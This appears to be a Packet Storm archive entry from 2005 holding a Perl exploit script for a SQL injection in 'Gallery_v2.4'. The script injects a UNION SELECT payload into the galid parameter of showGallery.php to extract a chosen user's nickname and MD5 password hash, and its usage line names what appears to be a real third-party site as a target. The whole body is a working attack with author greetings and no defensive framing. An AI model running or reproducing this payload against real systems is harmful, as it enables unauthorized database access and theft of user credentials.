gallery24.pl.txt

2005-11-08T00:00:00
ID PACKETSTORM:41336
Type packetstorm
Reporter Abducter
Modified 2005-11-08T00:00:00

Description

                                        
                                            `#!/bin/env perl  
#------------------------------------------------------------#  
#- Warning :- (ABDUCTER) Behind U BY (ABDUCTER_MINDS@S4A.CC) OR (ABDUCTER_MINDS@YAHOO.COM)  
#- [!] ==|| Gallery_v2.4 SQL Injection ||==  
#- Gr33tz :-   
#- N0N0 (MY LOVE)   
#- WWW.S4A.CC   
#- Devil-00   
#- FOR ALL ARABIAN COUNTRIES   
#------------------------------------------------------------#  
use LWP::Simple;  
  
print "\n\n==========================================\n";  
print "\n= Exploit for Gallery_v2.4 ";  
print "\n= BY |(ABDUCTER_MINDS[at]YAHOO.COM)| ";   
print "\n= FOR ALL ARAB WWW.S4A.CC ";   
print "\n============================================\n\n";  
  
if(!$ARGV[0] or !$ARGV[1]) {  
print "\n==|| Warning ABDUCTER Behind U ||==";   
print "\nUsage:\nperl $0 [host+script]\n\nExample:\nperl $0 http://tonioc.free.fr/gallery/ 1\n";  
exit(0);  
}  
$url = "/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,null,passw,null,nick,null,null,null,null,nick,null%20FROM%20users%20WHERE%20id=$ARGV[1]/*";  
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";  
print "[+] Connected to: $ARGV[0]\n";  
$page =~ m/<SPAN class="strong"><b>(.*?)<\/b>/ && print "[+] MD5 hash of password is: $1\n";  
print "[-] Unable to retrieve hash of password\n" if(!$1);  
  
`